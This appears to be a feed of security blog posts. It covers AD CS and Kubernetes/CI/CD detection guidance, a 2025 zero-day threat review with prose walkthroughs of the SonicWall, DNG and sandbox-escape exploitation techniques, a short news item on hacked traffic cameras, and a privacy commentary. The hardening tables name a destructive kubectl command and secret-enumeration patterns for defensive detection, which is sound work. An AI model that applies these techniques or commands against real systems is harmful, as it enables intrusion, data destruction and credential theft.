    Monitor event IDs 4886 (certificate request received) and 4887 (certificate issued) on CA servers. Alert when the requesting account's identity differs from the Subject Alternative Name (SAN) specified in the certificate.

    NTLM Relay to AD CS Web Enrollment (ESC8)

    T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay

    T1649 - Steal or Forge Authentication Certificates

    Monitor for NTLM authentication to AD CS HTTP enrollment endpoints from domain controllers or privileged servers. Correlate with PetitPotam coercion indicators. This attack chain provides a direct path from any domain user to Domain Admin.

    Table 30: Detection opportunities for AD CS abuse

    5. Preventing Destructive Actions in Kubernetes and CI/CD Pipelines

    Organizations should implement a proactive, defense-in-depth technical hardening strategy to systematically address foundational security gaps and mitigate the risk of destructive actions across their Kubernetes environments and Continuous Integration/Continuous Delivery or Deployment (CI/CD) pipelines. Adversaries increasingly target the CI/CD pipeline and the Kubernetes control plane because they serve as centralized hubs with direct access to application deployments and underlying infrastructure.

    • Source and Build Compromise: Threat actors target code repositories (e.g., GitHub, GitLab, Azure DevOps) and build environments to steal injected environment variables and secrets. Attackers can then commit malicious workflow files designed to exfiltrate repository data or deploy unauthorized infrastructure.

    • Container Registry Poisoning: By compromising developer credentials or CI/CD pipeline permissions, attackers overwrite legitimate application images in the container registry. When the Kubernetes cluster pulls the updated image, it unknowingly deploys a poisoned container embedded with backdoors, ransomware, or destructive data-wiping logic.

    • Cluster-Level Destruction: Once an attacker gains a foothold inside the Kubernetes cluster, they often abuse over-permissive role-based access control (RBAC) configurations. This provides the capability to execute destructive commands using application programming interfaces (APIs) (e.g., kubectl delete deployments), wipe persistent volumes, or delete critical namespaces, effectively causing a loss of availability and application denial of service.

    • Secrets Extraction and Lateral Movement: Attackers routinely execute Kubernetes-specific attack tools to harvest secrets from compromised Kubernetes pods. These secrets often contain database passwords and cloud identity and access management (IAM) keys, allowing the attacker to pivot out of the cluster and impact cloud-based resources.

    Additional information related to securing CI/CD.

    Hardening and Mitigation Guidance

    To defend against CI/CD compromises and destructive actions within Kubernetes, organizations must enforce strict identity boundaries, cryptographic trust, and a least-privilege architecture.

    • Isolate the Kubernetes Control Plane: Disable unrestricted and public internet access to the Kubernetes API server. For managed services like GKE, EKS, and AKS, ensure the control plane is configured as a private endpoint or heavily restricted via authorized network IP allow-listing. Access to the API should only be permitted from trusted, designated internal management subnets or secure corporate VPNs.

    • Secure Management Interfaces and CI/CD Pipelines: Enforce mandatory MFA for all access to infrastructure management platforms, including source code repositories such as GitLab/GitHub, and container registries. Utilize hardened container images (e.g., Chainguard containers, Docker Hardened Images) as base images. Implement software supply chain security frameworks (like SLSA) by requiring image signing, provenance generation, and admission controllers (such as Binary Authorization). This ensures that the Kubernetes cluster will definitively reject and block any unverified or poisoned container images from running.

    • Enforce Strict RBAC and Least Privilege: To limit the "blast radius" of a compromised pod, restrict the use of the cluster-admin role and strictly prohibit wildcard (*) permissions for standard service accounts. Workloads must run under strict security contexts—blocking containers from executing as root, preventing privilege escalation, and restricting access to the underlying worker node (e.g., disabling hostPID and hostNetwork).

    • Implement Immutable Cluster Backups: Protect the cluster's state (etcd) and stateful workload data (Persistent Volumes) by utilizing immutable backup repositories. This ensures that even if an attacker gains administrative access to the cluster or CI/CD pipeline and attempts to maliciously delete all resources, the backups cannot be destroyed or altered.

    • Enable Audit Logging and Threat Detection: Ensure Kubernetes Control Plane audit logs, node-level telemetry, and CI/CD pipeline logs are actively forwarded to a centralized SIEM. Deploy dedicated container threat detection capabilities to immediately alert on malicious exec commands, suspicious Kubernetes enumeration tools, or bulk data deletion attempts within the pods.

    Additional information related to securing Kubernetes.

    Detection Opportunities for Kubernetes and CI/CD

    Use Case

    MITRE ID

    Description

    Bulk Kubernetes Resource Deletion

    T1485 - Data Destruction

    Monitor Kubernetes API audit logs for bulk delete operations targeting Deployments, StatefulSets, Persistent Volume Claims, Namespaces, or ConfigMaps.

    Unsigned or Modified Container Image Deployed to Cluster

    T1525 - Implant Internal Image

    Monitor container registries and Kubernetes admission events for deployment of images that fail signature verification, lack provenance attestation, or originate from untrusted registries.

    Anomalous Kubernetes Secret Access

    T1552.007 - Unsecured Credentials: Container API

    Monitor Kubernetes audit logs for API calls to /api/v1/secrets or /api/v1/namespaces/*/secrets from service accounts or users that do not normally access secrets. 

    Alert on bulk secret enumeration and on access to secrets in sensitive namespaces.

    Unauthorized Modification to CI/CD Pipeline Configuration

    T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain

    Monitor source code repositories for modifications to CI/CD pipeline configuration files. 

    Alert on changes to pipeline definitions made by accounts that are not members of designated pipeline-owner groups, or changes pushed code outside of an approved pull request/merge request workflow.

    Privileged Container or Host Namespace Access

    T1611 - Escape to Host

    Monitor Kubernetes audit logs for pod creation or modification events requesting privileged security contexts, host namespace access, or volume mounts to sensitive host paths. These configurations allow container escape and direct access to the underlying worker node. Alert on any workload requesting these capabilities outside or pre-approved system namespaces.

    Kubernetes Audit Logging or Security Agent Tampering

    T1562.007 - Impair Defenses: Disable or Modify Cloud Firewall

    Monitor for modifications to Kubernetes API server audit policy configurations, deletion or redirection of log export sinks, and disablement or removal of container runtime security agents. Alert on changes to cluster-level logging configurations in managed services (GKE Cloud Audit Logs, EKS Control Plane Logging, AKS Diagnostic Settings) including disablement of API server, authenticator, or scheduler log streams.

    Table 31: Detection opportunities for Kubernetes and CI/CD

    Conclusion

    Destructive attacks, including ransomware, pose a serious threat to organizations. This blog post provides practical guidance on protecting against common techniques used by threat actors for initial access, reconnaissance, privilege escalation, and mission objectives. This blog post should not be considered as a comprehensive defensive guide for every tactic, but it can serve as a valuable resource for organizations to prepare for such attacks. It is based on front-line expertise with helping organizations prepare, contain, eradicate, and recover from potentially destructive threat actors and incidents.

    Israel Hacked Traffic Cameras in Iran

    5 March 2026 at 18:31

    Multiple news outlets are reporting on Israel’s hacking of Iranian traffic cameras and how they assisted with the killing of that country’s leadership.

    The New York Times has an on the intelligence operation more generally.

    Look What You Made Us Patch: 2025 Zero-Days in Review

    5 March 2026 at 15:00

    Written by: Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Sevens, Fred Plan


    Executive Summary

    Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels.

    In 2025, we continued to observe the structural shift, first identified in 2024, toward increased enterprise exploitation. Both the raw number (43) and proportion (48%) of vulnerabilities impacting enterprise technologies reached all-time highs, accounting for almost 50% of total zero-days exploited in 2025. We observed a sustained decrease in detected browser-based exploitation, which fell to historical lows, while seeing increased abuse of operating system vulnerabilities.

    State-sponsored espionage groups continue to prioritize edge devices and security appliances as prime entry points into victim networks, with just over half of attributed zero-day exploitation by these groups focused on these technologies. Commercial surveillance vendors (CSVs) maintained an interest in mobile and browser exploitation, adapting and expanding their exploit chains to bypass more recently implemented security boundaries and other mobile security improvements. Multiple intrusions linked to BRICKSTORM malware deployment demonstrated a range of objectives, but the targeting of technology companies demonstrated the potential theft of valuable IP to further the development of zero-day exploits.

    Key Takeaways

    1. Complexity drives higher mobile vulnerability counts.Mobile zero-day discovery counts fluctuated over the last three years, dropping from 17 in 2023 to 9 in 2024, before rebounding to 15 in 2025. As vendor mitigations evolve and increasingly prevent more simplistic exploitation, threat actors have been forced to expand or adjust their techniques. In some cases, attackers have increased the number of chained vulnerabilities to reach desired levels of access within highly protected components. Conversely, threat actors have also managed successful exploitation with fewer or singular bugs by targeting lower levels of access within a single capability, such as an application or service.
    2. Enterprise software and edge devices remain prime targets.Marking a new high, 48% of 2025’s zero-days targeted enterprise-grade technology. Increased exploitation of security and networking devices highlights the critical risk that can be posed by trusted edge infrastructure, while targeting of enterprise software exhibits the value of highly interconnected platforms that provide privileged access across networks and data assets. Networking and security appliances continued to be highly targeted, by a variety of threat actors, to gain initial access.
    3. Commercial surveillance vendors (CSVs) further reduce barriers to zero-day access. For the first time since we began tracking zero-day exploitation, we attributed more zero-days to CSVs than to traditional state-sponsored cyber espionage groups. This illustrates the expansion of access to zero-day exploitation via these vendors to a wider array of customers than ever before.
    4. People’s Republic of China (PRC)-nexus cyber espionage groups continue to dominate traditional state-sponsored espionage zero-day exploitation. Consistent with the trend we have observed for nearly a decade, in comparison to other state sponsors, PRC-nexus groups remained the most prolific users of zero-day vulnerabilities in 2025. These groups, such as UNC5221 and UNC3886, continued to focus heavily on security appliances and edge devices to maintain persistent access to strategic targets.
    5. Zero-day exploitation by financially motivated threat groups ties previous high. In 2025, we attributed the exploitation of 9 zero-days to confirmed or likely financially motivated threat groups. This nearly matches the total volume of 2023 and represents a higher proportion of all attributed vulnerabilities in 2025. 

    2026 Zero-Day Forecast

    Targets and Techniques Continue to Expand

    As certain vendors continue to drive improvements that have made vulnerability exploitation more difficult, particularly in the browser and mobile space, adversaries will continue to adapt with more expansive techniques and diverse targets. Enterprise exploitation will continue to be further enabled by the breadth of applications used across infrastructure. Increased numbers of software, devices, and applications expand attack surfaces, with successful exploitation requiring only a single point of failure to achieve a breach.

    AI Changes the Game

    We anticipate that AI will accelerate the ongoing race between attackers and defenders in 2026 creating a more dynamic threat environment. We expect adversaries will utilize AI to automate and scale attacks by accelerating reconnaissance, vulnerability discovery, and exploit development. Reducing the time required for these phases will place further pressure on defenders to better detect and respond to zero-day exploitation. At the same time, AI will empower defenders to harness tools like agentic solutions to enhance security operations. AI agents can proactively discover and help patch previously unknown security flaws, enabling vendors to neutralize vulnerabilities before exploitation. 

    Using Access for Research

    A BRICKSTORM malware campaign in 2025, attributed to PRC-nexus espionage operators, may indicate a new paradigm for zero-day exploitation where data theft has the potential to enable long-term zero-day development. Instead of just exfiltrating sensitive client data, the threat actors targeted intellectual property from the victim companies, potentially including source code and proprietary development documents. This IP could be used to discover new vulnerabilities in the vendor's software, not only posing a threat to the victims themselves but also to victims’ downstream customers.

    Scope

    This report describes what Google Threat Intelligence Group (GTIG) knows about zero-day exploitation in 2025. GTIG defines a zero-day as a vulnerability that was maliciously exploited in the wild before a patch was made publicly available. The following analysis leverages original research conducted by GTIG combined with reliable open-source reporting, though we cannot independently confirm the reports of every source. 

    Research in this space is dynamic and the numbers may adjust due to the ongoing discovery of past incidents. Our analysis represents exploitation tracked by GTIG but may not reflect all zero-day exploitation. The numbers presented here reflect our best understanding of current data, and we note that all zero-days included in our 2025 dataset have patches available. GTIG acknowledges that the trends observed and discussed in this report are based on detected and disclosed zero-days, with a cutoff date of Dec. 31, 2025. 

    A Numerical Analysis

    Zero-days by year

    Figure 1: Zero-days by year

    GTIG tracked 90 vulnerabilities that were disclosed in 2025 and exploited as zero-days. This number is consistent with a consolidating upward trend that we have observed over the last five years; the total annual volume of zero-days has fluctuated within a 60-100 range over this time period, but has remained elevated compared to pre-2021 levels. As certain categories of exploitation shift over time, whether due to vendor mitigations or newer high-value opportunities, total zero-day counts continue to appear within an expected range, rather than seeing drastic overall decreases or increases.

    Enterprise Exploitation Expands Further in 2025

    2025 zero-days in end-user vs enterprise products

    Figure 2: 2025 zero-days in end-user vs enterprise products

    Enterprise Technologies

    We identified 43 (48%) zero-days in enterprise software and appliances in 2025, up from 36 (46%) in 2024. This consistent proportion underscores the shift toward enterprise infrastructure as a structural change in the threat landscape, reflecting the value of tools that enable privilege escalation, high-level access, and broad scale of impact.

    • Security & Networking: These vulnerabilities made up about half (21) of the enterprise-related zero-days in 2025, remaining a prominent target for achieving code execution and unauthorized access via privileged infrastructure components. A lack of input validation and incomplete authorization processes were common flaws within these products, demonstrating how basic systemic failures continue to persist, but are fixable with proper implementation standards and approaches. Edge devices–often including security and networking devices–sit at the perimeter of an organization's infrastructure and remain high value targets. The absence of EDR technology on most edge devices, like routers, switches, and security appliances, can create a blind spot for defenders, making it an ideal attack surface. This limitation can hinder the ability to detect anomalies or gather host-based evidence once these devices are compromised. While 14 zero-days in 2025 were identified as affecting edge devices, this figure likely underrepresents the true scale of activity due to inhibited detection capabilities.
    • Enterprise Software: High-profile exploitation of enterprise tools and virtualization technologies demonstrates that attackers are deeply embedding themselves in critical business infrastructure. Threat actors continue to pursue the most vulnerable and exposed assets to work around mitigations that may exist in specific areas of or products within an infrastructure.

    End User Platforms and Products

    In 2025, 52% (47) of the tracked zero-days were used to exploit end-user platforms and products.

    • Operating Systems (OSs): OSs, including both desktop and mobile, were the most exploited product category in 2025, accounting for 44% (39) of all zero-days. This is a rise from previous years when comparing both raw numbers (31 in 2024, and 33 in 2023) and proportions of total zero-day exploitation (40% in 2024 and 33% in 2023). Desktop OS zero-days have fluctuated between 16 and 23 annually while maintaining a gradual upward trajectory, illustrating the foundational role of these platforms and the massive scale of effect permitted by OS-level exploitation.

    • Mobile Devices: Mobile OS exploitation in particular saw a notable increase, with a total of 15 zero-days in 2025 compared to the 9 identified in 2024. Given that we observed 17 mobile-related zero-days in 2023, the following factors likely accounted for this temporary decline and the subsequent resurgence in activity:

      • Multiple exploit chains discovered in 2025 included three or more vulnerabilities, inflating the number of individual vulnerabilities required to achieve a single objective.

      • Threat researchers discovered more complete exploit chains in 2025 than have been found in the past, when sometimes only partial chains or a single vulnerability was identified and could be accounted for.

      • Threat actors, and CSVs in particular, have found novel techniques to bypass new security boundary implementations.

    • Browsers: Browsers accounted for less than 10% of 2025 zero-day exploitation, a marked decrease from the browser-heavy years of 2021-2022. This suggests that browser hardening measures are working. However, we also assess that attackers’ operational security has improved and therefore made their actions more difficult to observe and track, potentially reducing the volume of observed exploitation in this space.

    Exploitation by Vendor

    2025 zero-day exploitation by vendor

    Figure 3: 2025 zero-day exploitation by vendor

    2025’s exploited vendors followed the same pattern we observed last year, with big tech experiencing the most zero-day exploitation and security vendors following directly behind. Big tech companies continue to dominate the user base for consumer products, making them prime targets for exploitation, particularly in desktop OSs, browsers and mobile systems. Cisco and Fortinet remain commonly targeted networking and security vendors, while Ivanti and VMware continue to see exploitation that reflects the high value threat actors place on VPNs and virtualization platforms.

    We observed 20 vendors who were exploited by just one zero-day each, further demonstrating threat actors’ success in targeting varying vendors and products to find successful footholds in desired targets.

    Types of Exploited Vulnerabilities

    As observed in prior years, zero-day exploitation was primarily used to achieve remote code execution, followed by gaining privilege escalation. These were especially common consequences in observed exploitation of big tech and security vendors. Both code execution and unauthorized access were common goals of network and edge infrastructure exploitation, displaying the advantage of exploiting high-privilege assets with widespread reach across systems and networks.

    2025 saw an array of both structural design flaws and pervasive implementation issues, exemplifying the omnipresence of known, yet prolific, problems. 

    • Injection & Deserialization: Command injection and deserialization were critical vectors in the enterprise space. These types of vulnerabilities often allow for reliable remote code execution (RCE) without the complexity of memory corruption exploits. SQL and command injection vulnerabilities were common in web-facing enterprise appliances, providing rudimentary avenues for initial access.
    • Memory Corruption: Threat actors continued to rely on memory corruption, with memory safety issues (particularly use-after-free [UAF] and out-of-bounds write) accounting for roughly 35% of the vulnerabilities. UAF weaknesses remained a top vector for user-centered products like browsers and OS kernels.
    • Access Control: The prevalence of authentication and authorization bypass vulnerabilities highlights the difficulty edge devices face in securing both the network perimeter and their own administrative interfaces.
    • Logic and Design Flaws: Frequently exploited in enterprise appliances, these issues represent fundamental architectural weaknesses where the system’s intended logic or design is inherently insecure. Because the software is behaving as designed, these flaws are harder for vendors to detect.

    Who Is Driving Exploitation

    Attributed 2025 zero-day exploitation

    Figure 4: Attributed 2025 zero-day exploitation

    Commercial Surveillance Vendor Exploitation Grows

    For the first time since we started tracking zero-day exploitation, we attributed more exploitation to CSVs than to traditional state-sponsored cyber espionage groups. Despite these actors’ increased focus on operational security that likely hinders discovery, this continues to reflect a trend we began to observe over the last several years–a growing proportion of zero-day exploitation is conducted by CSVs and/or their customers, demonstrating a slow but sure movement in the landscape. Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities. Over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before. 

    GTIG has reported extensively on the capabilities CSVs provide their clients as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights. In late 2025, we reported on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers. 

    People’s Republic of China (PRC)-Nexus Cyber Espionage Groups Still Most Prolific 

    Although the proportion of 2025 zero-day exploitation that we attributed to traditional state-sponsored cyber espionage groups was lower than in previous years, these groups remained significant developers and users of zero-day exploits in 2025. Consistent with the trend we have observed for nearly a decade, PRC-nexus cyber espionage groups remained the most prolific users of zero-days across state actors in 2025. We attributed the use of at least 10 zero-days to assessed PRC-nexus cyber espionage groups. This was double what we attributed to these groups in 2024, but below the 12 zero-days we attributed in 2023. PRC-nexus espionage zero-day exploitation continued to focus on edge and networking devices that are difficult to monitor, allowing them to maintain long-term footholds in strategic networks. Examples of this include the exploitation of CVE-2025-21590 by UNC3886 and the exploitation of CVE-2025-0282 by UNC5221.

    Observed mass exploitation of vulnerabilities suggests that PRC-nexus espionage operators are increasingly adept at developing, sharing, and distributing exploits among themselves. Historically, zero-day exploits were closely held and leveraged only by the most resourced threat groups. Over time, however, we have observed that an increasing number of activity clusters are exploiting vulnerabilities closer to public disclosure, indicating that PRC-nexus espionage operators have potentially reduced the time to both develop exploits and distribute them among otherwise separate groups. This is reflected not only in the gradual proliferation of exploit code targeting specific vulnerabilities, but also by the shrinking gap between the public disclosure of n-day vulnerabilities and their widespread exploitation by multiple groups. 

    In sharp contrast to 2024, during which we attributed the exploitation of five zero-days to North Korean state-sponsored threat actors, we did not attribute any zero-days to North Korean groups in 2025.

    Financially Motivated Exploitation Spikes

    We tracked the exploitation in 2025 of nine zero-days by likely or confirmed financially motivated threat groups, including the reported exploitation of two zero-days in operations that led to ransomware deployment. This almost ties the previous high of 10 zero-days we attributed to financially motivated groups in 2023 and is nearly double the five zero-days we attributed to financially motivated actors in 2024. Although the total volume of zero-day exploitation we have attributed to financially motivated groups has varied year over year, the sustained presence of these threat actors in the zero-day landscape reflects their continued investment in zero-day exploit development and deployment. Financially motivated actors, including ransomware affiliates, were linked to a substantial number of enterprise exploits, reflecting a trend we observed across multiple motivations.

    • We observed zero-day exploitation by FIN11 or associated clusters in four of the last five years–2021, 2023, 2024, and 2025. In late September 2025, GTIG began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand, which has predominantly been used by FIN11. The actor sent a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims' Oracle E-Business Suite (EBS) environments. Our analysis indicated that the CL0P extortion campaign followed months of intrusion activity targeting EBS customer environments. The threat actor exploited CVE-2025-61882 and/or CVE-2025-61884 as a zero-day against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025.
    • GTIG identified UNC2165, a financially motivated group that overlaps with public reporting on Evil Corp and has prominent members in Russia, leveraging CVE-2025-8088 to distribute malware in mid-July 2025. This activity marked the first instance where we observed UNC2165 use a zero-day for initial access. Additional evidence from underground activity and VirusTotal RAR archive submissions indicate that CVE-2025-8088 was also exploited during this same period by other actors, including a threat cluster with suspected overlaps with CIGAR/UNC4895 (publicly reported as RomCom). UNC4895 is another Russian threat group that has conducted both financially motivated and espionage operations, including the exploitation of two other zero-days in 2024.

    Spotlights: Notable Threat Actor Activity and Techniques

    Browser Sandbox Escapes

    The discovery of various browser sandbox escapes in 2025 provided an opportunity to evaluate current trends and developments in this area. Analysis of those identified this year revealed a significant trend: none were generic to the browser sandbox itself (e.g., CVE-2021-37973, CVE-2023-6345, CVE-2023-2136); instead, these sandbox escapes were specifically designed to exploit components of either the underlying operating system or hardware used. This section gives a brief technical overview of these vulnerabilities.

    Operating System-Based Sandbox Escapes

    CVE-2025-2783 targeted the Chrome sandbox on Windows. The vulnerability was caused by the improper handling of sentinel OS handles (-2) that weren’t properly validated. By manipulating inter-process communication (IPC) messages via the ipcz framework, an attacker could relay these special handles back to a renderer process. The exploit allowed a compromised renderer to gain access to handles, leading to code injection within more privileged processes and ultimately to a sandbox escape.

    CVE-2025-48543 affected the Android Runtime (ART), the system that translates application bytecode into native machine instructions to improve execution speed and power efficiency. A UAF vulnerability occurred during the deserialization of Java objects, such as abstract classes, that should not be instantiable in the first place. The most notable aspect of the exploit is how the bug can be reached from a compromised Chrome renderer. On recent Android versions, the exploit sent a Binder transaction to deliver a serialized payload embedded into a Notification Parcel object. The subsequent unparceling of the malicious object caused a UAF in ART, leading to arbitrary code execution within system_server, a service that operates with system-level privileges. While this specific vulnerability class and attack vector may be new publicly, we have observed Parcel mismatch n-day vulnerabilities being exploited to achieve Chrome sandbox escapes using the same attack vector in the past.

    Device-Specific Sandbox Escapes

    CVE-2025-27038 is a UAF vulnerability in the Qualcomm Adreno GPU user-land library that can be triggered through a sequence of WebGL commands followed by a specifically crafted glFenceSync call. The vulnerability allows attackers to achieve code execution within the Chrome GPU process on Android devices. We observed in-the-wild exploitation of this vulnerability in a chain with vulnerabilities in the Chrome renderer (CVE-2024-0519) and the KGSL driver (CVE-2023-33106).

    In a similar instance, CVE-2025-6558 targeted the Mali GPU user-land library. This vulnerability was triggered by a sequence of OpenGLES calls that were not properly validated by the browser. Specifically, an out-of-bounds write was caused within the user-land driver due to the issuance of glBufferData() with the GL_TRANSFORM_FEEDBACK_BUFFER parameter while a previous glBeginTransformFeedback() operation remained active. Google addressed this issue in ANGLE by implementing validation to invalidate this specific call sequence. We observed in-the-wild exploitation of this vulnerability in a chain with vulnerabilities in the Chrome renderer (CVE-2025-5419) and in the Linux kernel's posix CPU timers implementation (CVE-2025-38352).

    Additionally, CVE-2025-14174 is a vulnerability that affected the Metal backend on Apple devices. In that case, ANGLE incorrectly communicated a buffer size during the implementation of texImage2D operation, resulting in an out-of-bounds memory access within the Metal GPU user-mode driver.

    SonicWall Full-Chain Exploit

    In late 2025, GTIG collected a multi-stage exploit for SonicWall Secure Mobile Access (SMA) 1000 series appliances. The exploit chain leveraged multiple vulnerabilities to provide either authenticated or unauthenticated remote code execution as root on a targeted appliance, including one that was being leveraged as zero-day.

    Authentication Bypass (n-day)

    The exploit can be leveraged with or without an authenticated JSESSIONID session token. When executed without a token, the exploit attempts to get one for the built-in admin user by exploiting a weakness in SSO token generation within the Central Management Server feature in SMA 1000.

    This vulnerability was patched as a part of CVE-2025-23006. It was reported to SonicWall by Microsoft Threat Intelligence Center (MSTIC), and was reportedly exploited in the wild prior to it being patched in January 2025. GTIG is currently unable to assess if prior exploitation of this vulnerability is linked to use of this new exploit chain.

    Remote Code Execution (n-day)

    Once the exploit has a valid session cookie for the target, it attempts to attain remote code execution through a deserialization vulnerability, where an object is serialized and encoded with Base64, and then passed between the web application client and the appliance server without any integrity checks. This allows an attacker to forge a malicious Java object and send it to the server, which parses the object and causes arbitrary Java bytecode to be executed. The exploit leverages this primitive to run arbitrary shell commands using a payload generated by ysoserial, a common tool used to assist with exploiting Java serialization-related vulnerabilities.

    This vulnerability was patched by encrypting objects with AES-256-ECB prior to sending them to the client, using an ephemeral key generated randomly at server startup and stored in-memory. Payloads mutated without knowledge of the key won't be successfully parsed, which mitigates the risk of deserializing untrusted objects without another vulnerability leaking the encryption key. The patch was silently released in March 2024 without a CVE.

    Local Privilege Escalation (0-day)

    After exploiting the aforementioned deserialization vulnerability, the exploit is able to execute arbitrary shell commands as the mgmt-server user, which runs the Java process hosting the management web application. To escalate to root privileges, the exploit used a zero-day in ctrl-service, a custom XML-RPC service written in Python and bound to a loopback address on port 8081. This makes it inaccessible directly to a remote attacker, but accessible after already gaining code execution on the device at a lower privilege level. While this vulnerability could be exploited when combined with a newly discovered RCE vulnerability, or with direct console/SSH access to the appliance, we've presently only observed it being chained with the RCE exploit previously discussed.

    GTIG reported this vulnerability to SonicWall, who published a patch for it in December 2025 as CVE-2025-40602. To fix this vulnerability, SonicWall added signature verification to the service to prevent it from executing unsigned files.

    DNG Vulnerabilities

    This section specifically examines samples exploiting CVE-2025-21042, a vulnerability for which GTIG has not confirmed zero-day exploitation; however, we include this discussion of the underlying exploitation techniques because zero-days CVE-2025-21043 and CVE-2025-43300 share identical exploitation conditions.

    Between July 2024 and February 2025, several suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group. Upon investigation of these images, we discovered that they were digital negative (DNG) images targeting the Quram library, an image parsing library specific to Samsung devices.  

    The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp. The final payload, however, indicated that the exploit expects to run within the com.samsung.ipservice process. This is a Samsung-specific system service responsible for providing “intelligent” or AI-powered features to other Samsung applications, and will periodically scan and parse images and videos in Android’s MediaStore.

    When WhatsApp receives and downloads an image, it will insert the image in MediaStore. This permits downloaded WhatsApp images (and videos) to hit the image parsing attack surface within the com.samsung.ipservice application. However, WhatsApp does not intend to automatically download images from untrusted contacts. Without additional bypasses, and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore. This classifies as a “1-click” exploit. GTIG does not have any knowledge or evidence of the attacker using such a bypass to achieve 0-click exploitation.

    com.samsung.ipservice comes with a proprietary image parsing library named “Quram,” which is written in C++. The image parsing is done in-process, unsandboxed with respect to the service’s privilege. This breaks the Rule Of 2 and means a single memory corruption vulnerability can grant attackers access to everything to which com.samsung.ipservice has access, i.e. a phone’s entire MediaStore.

    This is exactly what the attackers did when they discovered a powerful memory corruption vulnerability (CVE-2025-21042), which allows controlled out-of-bounds write at controlled offsets from a heap buffer. With this single vulnerability, they were able to obtain code execution within the com.samsung.ipservice process and execute a payload with that process’ privileges.

    There were no significant hurdles for the attackers aside from some ASLR bypassing tricks. No control flow integrity mitigations, like pointer authentication code (PAC) or branch target identification (BTI), are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as jump-oriented programming (JOP) gadgets and construct a bogus vtable. The scudo allocator also failed to engage proper hardening techniques. The heap spraying primitives - more or less inherent to the DNG format - are powerful and allow for a predictable heap layout, even with scudo’s randomization strategy. The absence of scudo’s “quarantine” feature on Android is also convenient for deterministically reclaiming a free’d allocation.

    This case illustrates how certain image formats can provide strong primitives out of the box for turning a single memory corruption bug into 0-click ASLR bypasses and resulting remote code execution. By corrupting the bounds of the pixel buffer using CVE-2025-21042, subsequent exploitation can occur by taking advantage of the DNG specification and its implementation.

    The bug exploited in this case is both powerful and quite shallow. As Project Zero’s Reporting Transparency illustrates, several other vulnerabilities in the same component have been discovered over the recent months.

    These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface with a single relevant vulnerability, attackers are able to access all the images and videos of an Android’s MediaStore, posing a powerful capability for surveillance vendors.

    A more detailed technical analysis of the exploit can be found on Project Zero’s blog.

    Prioritizing Defenses and Mitigating Zero-Day Threats

    Defenders should prepare for when, not if, a compromise happens. GTIG continues to observe vulnerability exploitation as the number one initial access vector in Mandiant incident response investigations, outnumbering other vectors like stolen credentials and phishing. System architectures should be designed and built with ingrained security awareness, enabling inherent segmentation and least privilege access. Comprehensive defensive measures as well as response efforts require a real-time inventory of all assets to be audited and maintained. While not preventative, continuous monitoring and anomaly detection, within both systems and networks, paired with refined and actionable alerting capabilities is a real-time way to detect and act against threats as they occur. 

    The following is a non-comprehensive set of approaches and guidelines for defending against zero-day exploitation on both personal devices and within organizational infrastructure:

    1. Architectural Hardening & Surface Reduction

      • Infrastructure:

        • Ensure your DMZ, firewalls, and VPNs are properly segmented from critical assets, including the core network and domain controllers, in order to prevent lateral movement from compromised external components.

        • Monitor execution flow within applications in order to block unauthorized database queries and shell commands

        • Do not expose network ports of devices to the internet when not strictly required

      • Personal devices:

        • Turn off the device and/or leave the device at home when under increased risk of exploitation.

        • Put the device in before first unlock (BFU) mode and USB restricted mode when under increased risk of physical attacks.

        • Turn off cellular, WiFi and bluetooth when under increased risk of close proximity attacks.

        • Apply patches as soon as they become available.

        • Use ad blockers, configure Apple ad privacy settings, and enable the Android privacy sandbox options when possible.

        • Enable Android Advanced Protection Mode and iOS Lockdown Mode.

        • Remove applications, and disable services and features- including ones enabled by default- when not used.

    2. Advanced Detection & Behavioral Monitoring

    3. Operational Response

      • Infrastructure:

        • Maintain a Software Bill of Materials (SBoM) to reference and locate affected libraries of disclosed zero-days (e.g., Log4j) across the environment.

        • Establish a process for bypassing standard change management when vulnerabilities require immediate attention.

        • If a patch is unavailable, isolate systems and components with stop-gap measures such as disabling specific services or blocking specific ports at the perimeter.

      • Personal devices:

        • Reboot phone regularly.

        • Do not click on links or download attachments from unknown contacts.

    Prioritization is a consistent struggle for most organizations due to limited resources requiring deciding what solutions are implemented–and for every choice of where to put resources, a different security need is neglected. Know your threats and your attack surface in order to prioritize decisions for best defending your systems and infrastructure.

    The Anthropic-DOD Conflict: Privacy Protections Shouldn’t Depend On the Decisions of a Few Powerful People

    3 March 2026 at 22:35

    The U.S. military has officially ended its $200 million contract with AI company Anthropic and has ordered all other military contractors to cease use of their products. Why? Because of a dispute over what the government could and could not use Anthropic’s technology to do. Anthropic had made it clear since it first signed the contract with the Pentagon in 2025 that it did not want its technology to be used for mass surveillance of people in the United States or for fully autonomous weapons systems. Starting in January, that became a problem for the Department of Defense, which ordered Anthropic to give them unrestricted use of the technology. Anthropic refused, and the DoD retaliated.

    There is a lot we could learn from this conflict, but the biggest take away is this: the state of your privacy is being decided by contract negotiations between giant tech companies and the U.S. government—two entities with spotty track records for caring about your civil liberties. It’s good when CEOs step up and do the right thing—but it's not a sustainable or reliable solution to build our rights on. Given the government’s loose interpretations of the law, ability to find loopholes to surveil you, and willingness to do illegal spying, we needs serious and proactive legal restrictions to prevent it from gobbling up all the personally data it can acquire and using even routine bureaucratic data for punitive ends.

    Imposing and enforcing such those restrictions is properly a role for Congress and the courts, not the private sector. 

